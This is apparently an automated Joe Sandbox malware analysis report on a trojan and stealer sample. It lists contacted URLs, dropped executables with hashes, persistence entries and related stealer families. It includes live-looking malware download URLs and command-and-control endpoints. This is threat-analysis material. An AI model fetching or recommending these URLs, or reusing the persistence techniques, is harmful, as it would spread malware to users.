                                                                              high
                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://github.com/Zankop/baxter/raw/refs/heads/master/10279LbUK15.exe, 00000006.00000002.3336204963.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, 9LbUK15.exe, 00000006.00000000.2297604594.0000000000062000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                  high
                                                                                  https://raw.githubusercontent.com9LbUK15.exe, 00000006.00000002.3336204963.000000000241A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php--cinit-version=3.4.1--nicehashsvchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: phishing
                                                                                    unknown
                                                                                    http://185.215.113.16:80/off/def.exee44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://185.215.113.16/off/def.exe;e44fda3216.exe, 0000000B.00000002.3295646287.00000000004FA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      http://zealous-roentgen.66-63-187-122.plesk.pageEle.exe, 00000009.00000002.3318620989.0000000003661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: phishing
                                                                                      unknown
                                                                                      https://support.microsofe44fda3216.exe, 0000000B.00000003.2388451454.00000000053A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000012.00000002.2541734851.000001F1E2448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://zealous-roentgen.66-63-187-122.plesk.page/66/api/endpoint.php6svchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: phishing
                                                                                          unknown
                                                                                          http://185.215.113.16/off/def.exee44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplese44fda3216.exe, 0000000B.00000003.2388530393.0000000005375000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://185.215.113.16/off/def.exeExe44fda3216.exe, 0000000B.00000003.2765743260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2625395130.0000000000613000.00000004.00000020.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000002.3295906531.0000000000607000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://raw.githubusercontent.com/Zankop/baxter/refs/heads/master/10279LbUK15.exe, 00000006.00000002.3336204963.000000000241A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://arstechnica.com/civis/viewtopic.php?f=19&t=465002._psosx.pyc.55.drfalse
                                                                                                  high
                                                                                                  https://github.com/mgravell/protobuf-netJEle.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://zealous-roentgen.66-63-187-122.plesk.psvchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3315665185.0000022087A13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://zealous-roentgen.66-63-187-122.plesk.page/98.exeEle.exe, 00000009.00000002.3318620989.000000000326A000.00000004.00000800.00020000.00000000.sdmp, Ele.exe, 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    unknown
                                                                                                    https://github.com9LbUK15.exe, 00000006.00000002.3336204963.00000000023D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://contoso.com/Licensepowershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://docs.rs/getrandom#nodejs-es-module-supportregsvr32.exe, 00000011.00000002.3302250215.00007FFDF6E38000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                          high
                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=e44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://letterdrive.shop/apise44fda3216.exe, 0000000B.00000003.2506934025.0000000005349000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2467036443.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2506969643.0000000005354000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17e44fda3216.exe, 0000000B.00000003.2403168009.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388530393.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2403414689.000000000539A000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2388451454.00000000053A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://letterdrive.shop/apipe44fda3216.exe, 0000000B.00000003.2452794151.000000000534D000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2452825754.0000000005354000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://go.mic5NzL6O1Q.exe, 0000001E.00000002.2504235326.00000000012BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://letterdrive.shop/1520e44fda3216.exe, 0000000B.00000003.2625395130.0000000000605000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://svn.red-bean.com/bob/macholib/trunk/macholib/db3cab6cee.exe, 00000037.00000003.2778721078.000001E1978C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://www.w3.NzL6O1Q.exe, 00000036.00000002.2660245911.0000000002BBD000.00000004.00000800.00020000.00000000.sdmp, NzL6O1Q.exe, 00000038.00000002.2772672234.0000000002B9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://g.live.com/odclientsettings/ProdV2svchost.exe, 0000000A.00000003.2339462163.0000026F207C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://github.com/mgravell/protobuf-netiEle.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://x1.c.lencr.org/0e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://x1.i.lencr.org/0e44fda3216.exe, 0000000B.00000003.2417821430.000000000537B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://stackoverflow.com/q/11564914/23354;Ele.exe, 00000015.00000002.2870693997.0000000002A70000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://letterdrive.shop/api~e44fda3216.exe, 0000000B.00000003.2403302819.0000000005346000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installe44fda3216.exe, 0000000B.00000003.2388530393.0000000005375000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searche44fda3216.exe, 0000000B.00000003.2387503402.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387614390.000000000538C000.00000004.00000800.00020000.00000000.sdmp, e44fda3216.exe, 0000000B.00000003.2387430064.000000000538E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://contoso.com/powershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://letterdrive.shop/e44fda3216.exe, 0000000B.00000003.2750455557.000000000060B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://letterdrive.shop/apiobe44fda3216.exe, 0000000B.00000003.2433409561.0000000005348000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtTaskmgr.exesvchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                              unknown
                                                                                                                              https://support.mozilla.org/products/firefoxgro.alle44fda3216.exe, 0000000B.00000003.2419436378.0000000005464000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://zealous-roentgen.66-63-187-122.plesk.page/66/P.txtsvchost.exe, 00000035.00000002.3316261119.0000022087A2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3317388206.0000022087A6A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2502198822.0000022087A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: phishing
                                                                                                                                unknown
                                                                                                                                http://crl.microPe44fda3216.exe, 0000000B.00000003.2506704362.00000000005FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000012.00000002.2668048585.000001F1F2294000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://letterdrive.shop/api$e44fda3216.exe, 0000000B.00000003.2631938589.0000000005349000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpge44fda3216.exe, 0000000B.00000003.2420906180.000000000535B000.00000004.00000800.00020000.00000000.sdmpfalse
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                                                                                          IP
                                                                                                                                          127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585651
Start date and time: 2025-01-07 23:42:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 57
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.expl.evad.mine.winEXE@83/1075@0/13
EGA Information:
• Successful, ratio: 80%
HCA Information: Failed
                                                                                                                                          Cookbook Comments:
                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                          • Execution Graph export aborted for target e44fda3216.exe, PID 1608 because there are no executed function
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                          • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                          • VT rate limit hit for: file.exe
Time | Type | Description
17:44:00 | API Interceptor | 983x Sleep call for process: skotes.exe modified
17:44:08 | API Interceptor | 321x Sleep call for process: 9LbUK15.exe modified
17:44:11 | API Interceptor | 2x Sleep call for process: svchost.exe modified
17:44:13 | API Interceptor | 297x Sleep call for process: Ele.exe modified
17:44:14 | API Interceptor | 183x Sleep call for process: e44fda3216.exe modified
17:44:20 | API Interceptor | 34x Sleep call for process: powershell.exe modified
17:44:24 | API Interceptor | 1x Sleep call for process: pcqxl.exe modified
17:44:27 | API Interceptor | 117x Sleep call for process: NzL6O1Q.exe modified
22:43:05 | Task Scheduler | Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
22:44:14 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
22:44:23 | Task Scheduler | Run new task: pcqxl path: C:\Users\user\AppData\Local\Temp\pcqxl.exe
22:44:25 | Task Scheduler | Run new task: NzL6O1Q path: C:\Users\user\AppData\Roaming\NzL6O1Q.exe
22:44:28 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NzL6O1Q C:\Users\user\AppData\Roaming\NzL6O1Q.exe
22:44:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NzL6O1Q C:\Users\user\AppData\Roaming\NzL6O1Q.exe
22:44:48 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                          • 185.215.113.206
                                                                                                                                          EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.215.113.16
                                                                                                                                          5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          GITHUBUSCustomer.exeGet hashmaliciousXWormBrowse
                                                                                                                                          • 140.82.121.4
                                                                                                                                          Solara Bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          Solara.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 140.82.121.4
                                                                                                                                          https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          PO#6100008 Jan04.02.2024.Xls.jsGet hashmaliciousWSHRat, STRRATBrowse
                                                                                                                                          • 140.82.121.4
                                                                                                                                          ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 140.82.121.4
                                                                                                                                          ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                          • 140.82.121.3
                                                                                                                                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          file.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog StealerBrowse
                                                                                                                                          • 185.215.113.16
                                                                                                                                          same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          Fi3ptS6O8D.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                          • 185.215.113.43
                                                                                                                                          random(4).exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          random(6).exeGet hashmaliciousStealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          EdYEXasNiR.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                          • 185.215.113.16
                                                                                                                                          5EfYBe3nch.exeGet hashmaliciousLummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, StealcBrowse
                                                                                                                                          • 185.215.113.206
                                                                                                                                          No context
                                                                                                                                          Match:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe
                                                                                                                                            Associated Sample Name / URL:NzL6O1Q.exe
                                                                                                                                            Detection:malicious
                                                                                                                                            Threat Name:XWorm
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x510caab9, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1310720
                                                                                                                                            Entropy (8bit):0.4221738383287941
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                                                                                                                            MD5:405A716794B0A979E688FA0E5BBA0D9E
                                                                                                                                            SHA1:349FA920DE79B0499868E6E3F35862C96EDB79DB
                                                                                                                                            SHA-256:F1128D9D6DCC0F144ACFEEBB00596EE1533EE465F7190691536E489820130980
                                                                                                                                            SHA-512:9B96D83E24E4B22AFA9C9AA4DF4BC2EB84C81D45231509A6D2F1C5DE897BBDC98932879B8DBF63E487EC6D166EDFC645D94DB855B30EF3215432EECEA68E7790
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\pcqxl.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2625536
                                                                                                                                            Entropy (8bit):6.537979655585314
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:5f0h+NftcnTMnrLafwGzMwGy95OkO42/h9C+hIXSlDFGI/MEEsdD/gVm:W+NfSYnAwGzfb5xO42ZailDREEEO
                                                                                                                                            MD5:382DC2CC6405B237FA73B03EF0B52327
                                                                                                                                            SHA1:1FD284AF02569B01C46F81C67E419305B1CF4628
                                                                                                                                            SHA-256:F5A2F62F2BAC02EAB7FD22D868C5FA5AB61B517BFECC5C251817B6F9020E73C2
                                                                                                                                            SHA-512:6AD4C1819F11ACD02DC8A3CCBD19E516DCC92C5DD53A9C2ECA935E8615FF7024DB14E3072B786468343EFFBE66479C65C139555500B904FC0E337ABAFD791DFC
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                                                                                                                                            File Type:CSV text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):838
                                                                                                                                            Entropy (8bit):5.356471432431617
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhRAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oRAHKKkhHNpv
                                                                                                                                            MD5:E56A6A79CB531084A51F12C271BE7439
                                                                                                                                            SHA1:97A016CBE4C221936BAB8F76D33F7C021AA19ADF
                                                                                                                                            SHA-256:FA63B35C53D1B58B86D8C3CB3976AF7B7C096FD787EF1D33F63F5A31C87BC3E3
                                                                                                                                            SHA-512:B090CA13606574646D98D7B6F0FD5B16A7A6471FDC4F3CECDCFDDCC23925F97A3F0F5EEF3ECBE81A29B769FE7BCFF88DA0950FFD9A8D0FD2804F36171DE31D7A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..
                                                                                                                                            Process:C:\Users\user\AppData\Roaming\NzL6O1Q.exe
                                                                                                                                            File Type:CSV text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1076
                                                                                                                                            Entropy (8bit):5.370431226217922
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6o6+vxp3/elStHTHhAHW
                                                                                                                                            MD5:D603D2ADCDCF6029A48173C1C7CE4BCB
                                                                                                                                            SHA1:CB3FDFD78704FE3877DA96B4D62638B3C28D73C7
                                                                                                                                            SHA-256:6358CA58034DFBCEFF0B7A53ACAF24FDEAD10AFCB48411183DE774732E5B7723
                                                                                                                                            SHA-512:C1682C6845011CE79A6BC53738E3A190B91695DAA48EA82EAFEFBE6E90F1DF4D9928A499D398B4932B7528228E76397CBAD4FF39F859AE7903BEB51451EE1B7D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):5.886585917020445
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:IUkOZ0l/h1dhJIiBzqY0kj0BZK4BUbL0c5PJ7W7nRWr4Ih/VoxXL5ly2W+3W9usk:NbLGhKhjyNYsRnTBAtHzae6M
                                                                                                                                            MD5:86268AF17C4C5AFF970734EB5775A7F8
                                                                                                                                            SHA1:2C77E4720C8EB3AB8ACEF2E758B649D63FE16755
                                                                                                                                            SHA-256:6D8199A84B7256CF46B852E911221165C7FA044FBFC1642EF9ED24FFEE666470
                                                                                                                                            SHA-512:5443662D4A761FC77CBEE8883FF3677D7C1755DCA45D9F80440F211B1ECD19B695906B8A06027C980E5A5DC1B08010202E5653C63CC2658956D7D63F43BE65FF
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24997182
                                                                                                                                            Entropy (8bit):7.992307862787898
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:393216:hQvPJ/582VKol2VAkyoHf0O51u8MR5thr3woxkPnB/1isAlzKO4yFmE4RTdj0gNR:kPJmkpkAkhMKBorx3Lz/n4RTdIgEmSEr
                                                                                                                                            MD5:9D60674507EA97985C7E3B08D610F8D7
                                                                                                                                            SHA1:1FCCF49236815C14C5AE08ADB8D1B23846051B2D
                                                                                                                                            SHA-256:711CD08835ADD9FEECDD4AFCFB8DF8370FE98C22969FA2CB0CC010A8C8E25D12
                                                                                                                                            SHA-512:B841CD0C37171B666B8F03908B6643583D97625321F2017CAEBFB6C3F9B59ECB8F545586170D2467FE05C378E5411F1108CB3B4B53402661506FDD2F0F040DF6
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1967616
                                                                                                                                            Entropy (8bit):7.942586744122007
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:0Z7JUUPG9T4zOtKq2HydWyAjHWlP9O0C4drUzR4T+:0tPG9FXEyAEFtdrq4T+
                                                                                                                                            MD5:4F5013C5D4C13BCB3D9BB98AC601D056
                                                                                                                                            SHA1:8A4862EE54FAE9DF6AE6A8D2616B0D9D021B4FBD
                                                                                                                                            SHA-256:56DAFBBA12A48578DC834632CAA40DD7A96FA04FE04A7CAE87F60F960043C2D9
                                                                                                                                            SHA-512:CBFC65A34B1052E165677807F4A74AAEB7B14BF6E942CEAAF8B6CA2BF4F03DFD1878DEF3B31446E4910651971B3A3A4C0DE40120D2A57A0E67E1B232E9B3EA82
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1714462
                                                                                                                                            Entropy (8bit):7.946301893129129
                                                                                                                                            Encrypted:false
